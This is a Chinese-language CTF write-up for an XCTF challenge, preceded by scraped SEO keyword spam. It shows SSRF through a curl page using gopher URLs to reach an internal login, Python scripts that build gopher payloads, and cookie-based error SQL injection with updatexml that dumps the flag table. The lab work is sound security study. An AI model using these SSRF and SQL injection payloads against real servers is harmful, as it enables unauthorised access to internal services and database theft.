优秀设计方案网站,郑州抖音seo,山东英文网站建站,自己电脑做网站服务器关注这个靶场的其它相关笔记#xff1a;攻防世界#xff08;XCTF#xff09; —— 靶场笔记合集-CSDN博客 0x01#xff1a;考点速览
本关考察的是 SSRF 漏洞#xff0c;需要我们结合 Gopher 协议利用服务端进行越权 SQL 注入。考点不少#xff0c;总结一下主要有以下几点… 关注这个靶场的其它相关笔记攻防世界XCTF —— 靶场笔记合集-CSDN博客 0x01考点速览
本关考察的是 SSRF 漏洞需要我们结合 Gopher 协议利用服务端进行越权 SQL 注入。考点不少总结一下主要有以下几点 SSRF 漏洞 —— Gopher 协议的使用 HTTP 请求包转换为 Gopher 请求包 SQL 注入 —— Cookie 注入
0x02Write UP 进入靶场是一个登录框下面一行提示的字符 “you are not an inner user, so we can not let you have identify~” 既然考点是 SQL 注入我们尝试输入一些东西看看能不能触发漏洞 OK没有任何提示打开抓包工具重放请求包我们可以注意到如下两点 一个是显示我们的 Cookie 被消除了另外一个是一个 use.php 的页面我们在靶场链接后拼接 /use.php 进入该页面 “url you want to curl”我们知道 curl 命令是用来对服务器发起请求的。联想到靶场首页的提示 “you are not an inner user, so we can not let you have identify~” —— 你不是内部用户所以我们不能让你拥有身份。
我们大致可以确定攻击方向利用 use.php 页面中的 curl 命令进行 SSRF 攻击攻击的目标就是靶场首页的登录框。
确定了思路下面就开始实施吧这里需要拓展一个 Gopher 协议协议的简介如下 我们现在靶场首页的登录框中随便输入一组用户名加密码点击 Submit并抓取 POST 请求包我抓取的内容如下 POST / HTTP/1.1Host: 61.147.171.105:65176Content-Length: 20Cache-Control: max-age0Upgrade-Insecure-Requests: 1Origin: http://61.147.171.105:65176Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9Referer: http://61.147.171.105:65176/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q0.9Cookie: PHPSESSID78dp0ee6kimm21f8ik5eua4431Connection: closeuname123passwd123
而我们构造 Gopher 请求包其实用不了这么多数据精简后的请求包如下 POST / HTTP/1.1Host: 61.147.171.105:65176Content-Length: 20Content-Type: application/x-www-form-urlencodeduname123passwd123
下面继续深入思考一下我们是利用目标靶场的 use.php 页面发起的请求所以对于 use.php 而言靶场首页的登录框对他而言其实应该是在本地的所以我们这里的 HOST 需要改为 127.0.0.1:80。
下面就是将更改后的请求包转换为 Gopher 协议的请求了当然同上我们请求的目标 IP 地址和端口也是 127.0.0.1:80转换的 Python 代码如下: import urllib.parsehost 127.0.0.1:80payload uname123passwd123 # 请求包中的 payloadtemplate \POST / HTTP/1.1Host: {}Content-Length: {}Content-Type: application/x-www-form-urlencoded{}.format(host, len(payload), payload)def gopher_data(string)::param string: 待转换的请求包:return:encode_result urllib.parse.quote(string) # 进行 url 编码# 回车 \n - url 编码后 - %0A - 将 %0A 替换为 %0D%0A; 数据包模板末尾有一个换行就不用额外添加 %0D%0A 了return gopher://{}/_{}.format(host, encode_result.replace(%0A,%0D%0A))print(gopher_data(template))
输出的 Payload 如下 gopher://127.0.0.1:80/_POST%20/%20HTTP/1.1%0D%0AHost%3A%20127.0.0.1%3A80%0D%0AContent-Length%3A%2020%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0A%0D%0Auname%3D123%26passwd%3D123%0D%0A
将 Payload 黏贴到 use.php 中并点击 submit 可以看到我们成功请求了目标网页并且还有返回信息 这里我们将请求包中的 uname 和 passwd 替换为弱口令 admin再次生成 Payload 后发起请求可以看到如下内容 gopher://127.0.0.1:80/_POST%20/%20HTTP/1.1%0D%0AHost%3A%20127.0.0.1%3A80%0D%0AContent-Length%3A%2024%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0A%0D%0Auname%3Dadmin%26passwd%3Dadmin%0D%0A OK熟悉的 “this_is_your_cookie”不同之前的 “delete”这次请求算是成功了我们将该 Cookie 的值复制一下进行一下解码 再联想一下 SQL 注入注入点这不就出来了既然注入点在 Cookie 这里那携带 Payload 其实也不需要了Payload 本来就是为了去后端查表验证用户是否是正规用户的Cookie 也有这个作用。
所以修改后的请求包模板如下 POST / HTTP/1.1Host: {}Content-Length: 0Content-Type: application/x-www-form-urlencodedCookie: this_is_your_cookie{}
相应的生成攻击载荷的代码如下 import base64import urllib.parsehost 127.0.0.1:80template \POST / HTTP/1.1Host: {}Content-Length: 0Content-Type: application/x-www-form-urlencodedCookie: this_is_your_cookie{}def gopher_data(string)::param string: 待转换的请求包:return:encode_result urllib.parse.quote(string) # 进行 url 编码# 回车 \n - url 编码后 - %0A - 将 %0A 替换为 %0D%0A; 数据包模板末尾有一个换行就不用额外添加 %0D%0A 了return gopher://{}/_{}.format(host, encode_result.replace(%0A,%0D%0A))def create_payload(payload):global templatepayload base64.b64encode(payload.encode(utf-8)).decode(utf-8) # 对 Payload 进行 Base64 编码template template.format(host,payload)return gopher_data(template)if __name__ __main__:payload input(Input Payload: )print(create_payload(payload))
利用此脚本即可生成对应的 gopher 协议脚本比如我们测试用户名为 admin Input Payload: admingopher://127.0.0.1:80/_POST%20/%20HTTP/1.1%0D%0AHost%3A%20host%0D%0AContent-Length%3A%200%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0ACookie%3A%20this_is_your_cookie%3DYWRtaW4n%0D%0A 探测出后端的 SQL 攻击模板为 admin) 攻击代码 #
而且既然它会报错那我们直接使用报错注入即可下面我就简单的写一下测试的 SQL 语句具体的 Payload 拿上面的 Python 脚本即可生成 获取当前数据库中存在的表名Input Payload: admin) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),0x7e),1) #关键报错Issue with your mysql: XPATH syntax error: ~emails,flag,referers,uagents,us - 提取关键信息 flag 表获取 flag 表中的字段名Input Payload: admin) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameflag),0x7e),1) #关键报错Issue with your mysql: XPATH syntax error: ~flag~获取 flag 表中的 flag 字段的所有信息Input Payload: admin) and updatexml(1,concat(0x7e,(select group_concat(flag) from flag),0x7e),1) #关键报错Issue with your mysql: XPATH syntax error: ~cyberpeace{a0e9c720fecbd276d9f6获取 flag 剩余内容使用 mid 进行截取Input Payload: admin) and updatexml(1,concat(0x7e,(select mid(group_concat(flag),20,50) from flag),0x7e),1) #关键报错Issue with your mysql: XPATH syntax error: ~fecbd276d9f611e262249a87}~拼接后的 flagcyberpeace{a0e9c720fecbd276d9f611e262249a87}
0x03参考链接
SSRF利用协议中的万金油——Gopher_dict协议-CSDN博客文章浏览阅读4.5k次点赞7次收藏38次。SSRF利用协议中的万金油——Gopher_dict协议https://blog.csdn.net/qq_50854662/article/details/129180268
SSRF防护绕过思路与Gopher利用浅析 - 先知社区先知社区先知安全技术社区https://xz.aliyun.com/t/14086?time__1311mqmx9DBG0QYxyDBqDTeeuut5LhENWYDalichlgrefhttps%3A%2F%2Fcn.bing.com%2F
